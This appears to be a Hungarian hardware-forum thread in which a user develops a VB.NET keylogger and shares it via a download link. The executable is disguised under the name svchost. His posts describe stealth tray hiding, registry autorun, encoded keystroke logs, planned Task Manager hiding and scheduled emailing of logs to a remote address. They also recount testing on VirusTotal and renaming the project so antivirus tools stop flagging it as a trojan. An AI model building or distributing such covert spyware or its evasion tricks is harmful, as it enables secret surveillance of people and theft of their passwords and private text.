Új hozzászólás Aktív témák
-
himre82
csendes tag
válasz
Genome__
#201
üzenetére
nem tudom, mi okozza. lehet, hogy az, hogy net 3.5 alatt fejlesztettem?
a régi, több mint 10 éves gépen, amin xp van, meg net 3.5, azon gond nélkül fut.
lehet, hogy a net 4-ből hiányzik az, ami a a net 3.5-ben meg benn van? nehezen hihető. de nincs kizárva.
most nézem ezt a linket, valami ilyesmiről lehet szó.
-
himre82
csendes tag
a 10-20 irreálisan alacsony.
ha csak abból indulsz ki, hogy egy sorban hány karakter fér el (pl. egy word dokumentumban v. egy fórumban), akkor a 10-20 nagyon alacsony. Ez pedig azt eredményezi, hogy a html-be exportált log fájl majd nehezebben lesz olvasható a gyakori sortörések miatt.
az automatikus indítás valóban csak admin joggal oldható meg.
-
#197
himre82
csendes tag
Greenebola
#196
himre82
csendes tag
válasz
Greenebola
#196
üzenetére
ok; ezt kiküszöbölni sajnos nem tudom.
-
#195
himre82
csendes tag
Greenebola
#194
himre82
csendes tag
válasz
Greenebola
#194
üzenetére
a múltkorinál írt ki ilyeneket, hogy api használat, meg bill naplózás.
most nem írt ki ilyeneket, vagy azokat a képeket most nem tetted be ide?
-
himre82
csendes tag
azért, mert először be kell állítani (konfigurálni). az előző verzióhoz tartozott egy leírás, ehhez már nem mellékeltem.
ctrl+f11-et nyomd meg kétszer, feljön az ablak, állítsd be, hogy hova mentse a log fájlt, megadhatod pl a fájlnevet, kiterjesztést, aztán kattints a konfigurálás gombra, és kész.
-
himre82
csendes tag
pár dolgot kivettem belőle, és a magját újra írtam, így működik uac alatt is, a hosszú í-t is loggolja, meg ha távoli asztalon dolgozunk, azt is. persze, ha autostart-ot is akarunk, akkor rendszergazdaként kell futtatnunk, ha az uac be van kapcsolva.
Greenebola-tól még várok a nis 2012 sonar eredményre éles rendszeren (korábban írta, hogy sandbox-ban nem jelzett a sonar).
még egy fontos dolog: nincs benne 30 napos korlát. mindenki szabadon használhatja a saját felelősségére.
edit: még annyi, hogy MINDEN billentyűleütést naplóz, még a kombinációkat is (pl. alt+f11, ctrl+i, stb.) A dupla kombinációkat már nem (pl. ctrl+shift+k). Az altgr-rel előhívható jeleket is naplózza.
-
#187
himre82
csendes tag
Greenebola
#186
himre82
csendes tag
válasz
Greenebola
#186
üzenetére
az eltávolításhoz egyszerűen törölni kell a programot és fájljait, valamint a registry-ből az autorun bejegyzést.
-
#182
himre82
csendes tag
Greenebola
#181
himre82
csendes tag
válasz
Greenebola
#181
üzenetére
de az, amit tegnap elküldtem Diónak, arra nem jelez be, az 100%. Semmilyen vírusirtó sem. Virustotal-on tesztelve. Tegnap.
Te még a legkezdetleges verziót töltötted le, azt, amelyikről csak leporoltam a port, és feltöltöttem. Nem módosítva benne semmit.
-
himre82
csendes tag
válasz
Secretive
#172
üzenetére
az autostart már alapból benne volt, hiszen úgy nem ér az egész semmit.
érzékeli, ha xp-d vagy vista-d/win7-ed van, mert attól függően máshova kell tenni a registry-be a bejegyzést.
a főablak nyitási kombinációja is már rég megvan.
remélem, itt a hosszú hétvégén befejezem
"jpg Q 80%"
ezzel mire gondoltál?
-
himre82
csendes tag
html exportnak jó lesz?
-
-
himre82
csendes tag
új fejlemény:
úgy néz ki, nem szereti az svchost nevet:
kitöröltem minden kódot, és átneveztem a projectet, majd úgy fordítottam le, nem talált semmit.
újra kitöröltem minden kódot, nem neveztem át a projectet, megtalálta a trójait.
ezek után az eredeti projektben átneveztem a projektet, fordítás, feltöltés, és nem talált semmit sem.
-
himre82
csendes tag
kitöröltem minden kódot a programból, és úgy fordítottam le, majd feltoltam a virustotal-ra, és így is ugyanazt a trójait találta.
tehát itt valami más lehet a gond.
Nem hiába írtam, hogy ez a keylogger nem a szokványos eljárásokkal készült, és azért nem jeleznek a vírusirtók.
-
himre82
csendes tag
válasz
Secretive
#157
üzenetére
a program nem a szokványos keylogger módszereket alkalmazza, ezért is nem találta más vírusirtó gyanúsnak. Egy olyan módszert gondoltam tovább, amit eredetileg teljesen másból kifolyólag hoztak létre, de kicsit átdolgozva alkalmas lett keylogger-nek.
egyébként a te gépeden kipróbáltad? ha igen, ott jelzett a vírusirtó?
-
himre82
csendes tag
válasz
Secretive
#155
üzenetére
sima txt fájlként jeleníti meg a naplófájlt, jelenleg nem naplózza azt, hogy milyen ablakban, alkalmazásban gépeltünk. De kiegészíthető...
csak az a fránya trójai ne lenne benne. Majd megpróbálom elhatárolni azt a kódrészletet, ami miatt érzékeli a két említett vírusirtó. De érdekes, hogy a többi nagy meg meg sem említ semmit.
-
himre82
csendes tag
válasz
Secretive
#153
üzenetére
szia!
igen, vb.net.
ezek szerint nálad működik?
amikkel ki lehetne egészíteni:
- a billentyűleütéseket választás szerint vagy x másodperc eltelte után tárolja, vagy x karakter leütése után
- programablak megnyitása egy a felhasználó által megadott billentyűkombinációval
- bizonyos időközönként (pl. 8 óra) automata e-mail küldés egy a felhasználó által beállított e-mail címre a kódolt állománnyal (jelenleg hotmail-ra már működik)
- task manager-ben a process elrejtése (folyamatban)
- a billentyűk letárolásakor mentsen időpontot is (komplett timestamp), hogy az ember tudja, mikor gépeltek mit; itt arra gondolok, hogy pl napi szinten mentsen le egy dátumot (esetleg meghatározott óránként)
- dekódoláskor jelenleg pl. ezt a szöveget, hogy "TESZT", így dekódolja: {Capslock}teszt{Capslock}, ezt meg lehetne úgy változtatni, hogy a dekódolt fájlban már csak TESZT szerepeljen
- valamint pl ha ezt gépelem, hogy "teszj" és kitörölöm a j-t, és pótlom t-vel, akkor ezt dekódolja: teszj{Backspace}t, esetleg ebből is ki lehetne szedni a {Backspace}-t, hogy csak a teszt maradjon a végén, így könnyebb lesz majd olvasni a dekódolt állománytezt mind le tudom programozni.
ami majd érdekes lehet, a bill használat karaktereit tárolja-e valamilyen logika szerint, vagy csak halomra egymás után
itt mire gondolsz?
a billentyűleütéseket egymás után tárolja.
-
himre82
csendes tag
sziasztok!
ezt próbálja ki valaki.
http://www.2shared.com/file/2Auxvdl1/svchost.html
saját fejleszés. betűk, számok, shift+betűk, shift+számok, numpad, enter, tab, capslock, backspace, delete billentyűket naplózza, a többi nem érdekelt.
win vista és win 7-en műdödik, xp-n ezt a változatot még nem teszteltem, arra van egy külön xp-s verzióm, bár lehet, hogy olyan xp-n, ahol van net 3.5, rendesen fut
uac-t ki kell kapcsolni, hogy működjön
avast és avg ezt ismerte fel benne: MSIL Crypt-FT [Trj] (a virustotal-on teszteltem le).
működése: elindítod, leteszi magát a tray-be, úgy, hogy nem látszik, és bele írja a registry-be a bejegyzést, hogy autorun legyen
induláskor létrehoz egy fájlt az exe mappájában, és a billentyűleütéseket ebbe naplózza kódolva. ctrl+f11-re (néha kétszer kell megnyomni) feljön az ablak, és ha megnyomjuk a dekódolás gombot, akkor létrehoz egy dekódolt fájlt szintén az exe mappájában. a szokásos x-szel bezárhatjuk a programot.
a billentyűleütéseket bizonyos leütésenként menti (asszem 40-re állítottam be).
ha kilépéskor még nincs meg a 40 leütés, a kódolt fájlba akkor is beleírja az addig leütött billentyűket, és a következő dekódoláskor ezt a maradékot is dekódolja.mindenféle aprósággal ki lehet egészíteni, de megírásakor nem ez volt a cél, hanem az, hogy legyen egy egyszerű program, ami letárolja a billentyűleütéseket kódoltan.
saját gépemen (win7 x64) kifogástalanul működik, munkahelyi gépen (win7 x32) is elindult (ott van uac, de rendszergazdai jogosultságokkal futtattam), viszont ott valami miatt leblokkolta a billentyűket, és csak a task managerből való kilövéssel sikerült lekapcsolni.
nem teszi tönkre a számítógépet, nem formázza le a c-t, stb. ha nem jó, egyszerűen letörlöd, registryből kiveszed az autorun-t, és mész tovább.
Új hozzászólás Aktív témák
- Jogász topik
- Itt a Galaxy S26 széria: az Ultra fejlődött, a másik kettő alig
- AMD Navi Radeon™ RX 7xxx sorozat
- Milyen notebookot vegyek?
- A TCL egyebek mellett egy 1040 Hz-re képes monitorral készül az idei évre
- Apple asztali gépek
- Gumi és felni topik
- E-roller topik
- Micro Four Thirds
- Sorozatok
- További aktív témák...
- Számlás!Steam,EA,Epic és egyébb játékok Pc-re vagy XBox!
- PC Game Pass előfizetés
- Játékkulcsok ! : PC Steam, EA App, Ubisoft, Windows és egyéb játékok
- Windows 10 11 Pro Office 19 21 Pro Plus Retail kulcs 1 PC Mac AKCIÓ! Automatikus 0-24
- Xbox / Microsoft Store feltöltőkártya kód (digitális, HU) több címlet, több db, azonnal, olcsón
- GYÖNYÖRŰ iPhone 13 mini 128GB Midnight -1 ÉV GARANCIA - Kártyafüggetlen, MS3060
- Beszámítás! VALVE INDEX virtuális valóság szemüveg garanciával hibátlan működéssel
- BESZÁMÍTÁS! Akár részletfizetés 0% THM ÚJ AMD RYZEN AM4 processzorok 3 év garanciával 27% áfaval
- HIBÁTLAN iPhone 15 Plus 128GB Blue-1 ÉV GARANCIA - Kártyafüggetlen, MS4531,90% Akksi
- Beszámítás! MSI G27C4 E3 27 180Hz FHD VA 1ms gamer monitor garanciával hibátlan működéssel
Állásajánlatok
Cég: Laptopműhely Bt.
Város: Budapest